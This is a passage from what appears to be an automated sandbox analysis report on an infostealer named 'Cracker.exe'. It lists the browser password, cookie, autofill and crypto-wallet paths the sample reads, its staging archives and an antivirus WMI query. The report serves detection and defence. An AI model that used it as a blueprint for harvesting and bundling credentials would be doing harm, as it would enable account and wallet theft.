      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
      Source: Cracker.exe, 00000000.00000002.1979276829.00000297930A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPP9
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
      Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\Desktop\Cracker.exe; NtWriteFile: Indirect: 0x7FF67AC1DB77
      Source: C:\Users\user\Desktop\Cracker.exe; NtReadFile: Indirect: 0x7FF67AC252C7
      Source: C:\Users\user\Desktop\Cracker.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\Cracker.exe VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\EFOYFBOLXA.png VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\EFOYFBOLXA.png VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.png VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\IPKGELNTQY.docx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT.pdf VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT.pdf VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\NEBFQQYWPS.docx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\NEBFQQYWPS.docx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\NEBFQQYWPS.xlsx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\NEBFQQYWPS.xlsx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.mp3 VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\PIVFAGEAAV.png VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\PIVFAGEAAV.png VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE.jpg VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE.jpg VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.mp3 VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.pdf VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.pdf VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.xlsx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\SQSJKEBWDT.jpg VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\SQSJKEBWDT.mp3 VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\SUAVTZKNFL.pdf VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\SUAVTZKNFL.pdf VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.jpg VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.jpg VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.xlsx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.xlsx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\desktop.ini VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\EFOYFBOLXA.png VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\EFOYFBOLXA.png VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\GAOBCVIQIJ.png VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\GAOBCVIQIJ.png VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\IPKGELNTQY.docx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\IPKGELNTQY.docx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\LSBIHQFDVT.docx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\LSBIHQFDVT.docx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\LSBIHQFDVT.pdf VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\LSBIHQFDVT.pdf VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\NEBFQQYWPS.docx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\NEBFQQYWPS.docx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\NEBFQQYWPS.xlsx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\NEBFQQYWPS.xlsx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\PALRGUCVEH.mp3 VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\PIVFAGEAAV.png VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\PIVFAGEAAV.png VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\PWCCAWLGRE.jpg VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\PWCCAWLGRE.jpg VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\QNCYCDFIJJ.mp3 VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\QNCYCDFIJJ.pdf VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\QNCYCDFIJJ.pdf VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\QNCYCDFIJJ.xlsx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\QNCYCDFIJJ.xlsx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\SQSJKEBWDT.jpg VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\SQSJKEBWDT.jpg VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\SQSJKEBWDT.mp3 VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\SUAVTZKNFL.pdf VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\ZQIXMVQGAH.jpg VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\ZQIXMVQGAH.jpg VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\ZQIXMVQGAH.xlsx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\Documents\ZQIXMVQGAH.xlsx VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Autofill VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Cookies VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Downloads VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\History VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\screen1.png VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\sensitive-files.zip VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\user_info.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\user_info.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Wallets VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Passwords\Chrome_Default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Passwords\Chrome_Default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Passwords\Edge_Default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Passwords\Edge_Default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Passwords\Firefox_qnq0haq7.default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Passwords\Firefox_qnq0haq7.default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\History\Chrome_Default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\History\Chrome_Default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\History\Edge_Default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\History\Edge_Default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\History\Firefox_qnq0haq7.default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Downloads\Chrome_Default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Downloads\Edge_Default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Downloads\Edge_Default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Downloads\Firefox_qnq0haq7.default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Cookies\Chrome_Default_Network.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Cookies\Edge_Default_Network.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Cookies\Edge_Default_Network.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Autofill\Chrome_Default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Autofill\Edge_Default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Autofill\Firefox_qnq0haq7.default.txt VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Users\user\Desktop\Cracker.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

      Stealing of Sensitive Information

      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: Process Memory Space: Cracker.exe PID: 7528, type: MEMORYSTR
      Source: Cracker.exe, 00000000.00000003.1902748898.00000297930EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets\Data
      Source: Cracker.exe, 00000000.00000003.1902748898.00000297930EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets\Data
      Source: Cracker.exe, 00000000.00000003.1902689034.00000297930E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Wallets\Jaxx\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\xt
      Source: Cracker.exe, 00000000.00000003.1902748898.00000297930EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\ux
      Source: Cracker.exe, 00000000.00000003.1902689034.00000297930EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore\@
      Source: Cracker.exe, 00000000.00000003.1902748898.00000297930EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\ux
      Source: Cracker.exe, 00000000.00000003.1902689034.00000297930EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore\@
      Source: Cracker.exe, 00000000.00000003.1902689034.00000297930EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
      Source: Cracker.exe, 00000000.00000003.1902748898.00000297930EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\ux
      Source: Cracker.exe, 00000000.00000003.1902689034.00000297930EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore\@
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhl
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login Data
